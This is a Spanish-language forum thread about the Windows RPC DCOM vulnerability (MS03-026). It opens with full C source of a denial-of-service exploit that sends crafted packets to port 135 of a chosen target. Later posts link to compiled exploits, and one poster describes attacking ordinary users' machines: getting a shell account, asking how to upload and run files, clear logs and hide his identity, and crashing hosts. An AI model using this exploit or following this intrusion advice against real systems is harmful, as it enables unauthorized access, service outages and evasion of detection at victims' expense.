Por fin sacaron el exploit!!!  

Este es el fallo:
http://www.hispasec.com/unaaldia/1728/

Y este el exploit (solo para win2k? ) :

------------------------------------------------------------------------

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
    WSADATA WSAData;
 int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
 
 short port=135;
 unsigned char buf1[0x1000];
 printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
 printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);exit(1);
 }


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
 
 if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
 if(WSAConnect(sock,(struct sockaddr*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
 {
  printf("Connect failed.Error:%d",WSAGetLastError());
  return;
 }
 if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }

 i=recv(sock,buf1,1024,MSG_PEEK);
 if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }
 i=recv(sock,buf1,1024,MSG_PEEK);
}

----------------------------------------------------------------------

Fuente:
http://www.security.nnov.ru/files/w2krpcdos.c

Jea, jea, Microsoft es la leche xDDD

*******************Editado****************

Me acabo de dar cuenta, las shellcodes no tienen muchos nulls?? (0x00) Para mi que esto no funciona..., pues los arrays creeran que los 0x00 son los "fin de cadena" y no pasaran los demas opcodes...

Tengo q hacer pruebas... =8-)

Puedes usar el LCCWin, tiene el mismo motor que el GCC y es muy sencillo.

A mi me da que este exploit no tira, por lo que dije de los nulls.. Lamentablemente no lo he podido probar aun....

Y si, aunq no lo creas, es para win (fijate en las cabeceras que usa, winsock2.h, windows.h, etc...)

este codigo tiene errores al compilarlo desde mi dev-c++ me tira ciertos errores todavia no estoy en tema como para corregirlos
¡Alguien lo pudo compilar? o me dice donde puedo conseguir este codigo sin que este capado
Gracias Un Saludo

More info & exploits:

http://packetstormsecurity.nl/0307-exploits/benjurry.txt <--- Informacion tecnica del fallo y exploit para linux

http://packetstormsecurity.nl/0307-exploits/DComExpl_UnixWin32.zip   <--- EXPLOIT PARA WINDOWS, Y COMPILADO!!!

http://www.cyruxnet.com.ar/rpcxploit.htm  <---  Gran Articulo de Cyruxnet

A mi me ha ido pero despues al crear la cuenta shell no me ha rulado el telnet... Sabeis donde puedo conseguir mas informacion sobre los comandos de net y como subir algun archivo y su ejecucion.

Y como obtengo el anonimato mediante msdos ?? Shockchain y lo ejecuto desde alli? Y los comandos de net user y eso nos sabes donde puedo piyar info?? Otra duda es cuando se lanza el exploit en algunos dejan de responder y al hacerle el ping me da tiempo de espera llo que dice que ha debido reiniciar o algo similar...

Saludos.

UmMm esta tarde lo vere mas trankilo que quedan muchas cosillas por ver. Una duda una vez que conectas cuando borrsa el log se supone que al salir no insertar tu ip como que has salido del sistema ¿no? xq sino de nada valdria borrarlos xDDDD.

Y en caso de no borrar el log tampoco creo que pase nada porque lo he estado practiacando con usuarios normales que no creo q piloten tanto la verda, mas que nada xq ni si quiera intene una web subida a su server xDDD. Tambien lo probe con uno de los windows q tengo instlaado el 2003 corporate y peto cosa mala xDD


Por cierto al otro lamercillo que ha cntstado en este post piedo que borre eso y lo ponga en un post diferente y que si realmente se hace llamar o pasarse x un hacker es que no lo es DIOSSSSSSS !!!!, es más podria decirle perfectamente que no sabe lo que significa ser HACKER, es una palabra que pesa mucho tio a ver si leemos un poco mas en vez de mascar tanto.

el Parche:

Windows 2000 Security Patch: Buffer Overflow In RPC Interface

http://www.microsoft.com/security/security_bulletins/ms03-026.asp

<-->

El lenguaje de my System   Español (alfabetizacion internacional) ¿cual deberia tener para ser compatible con el Update?

Saludos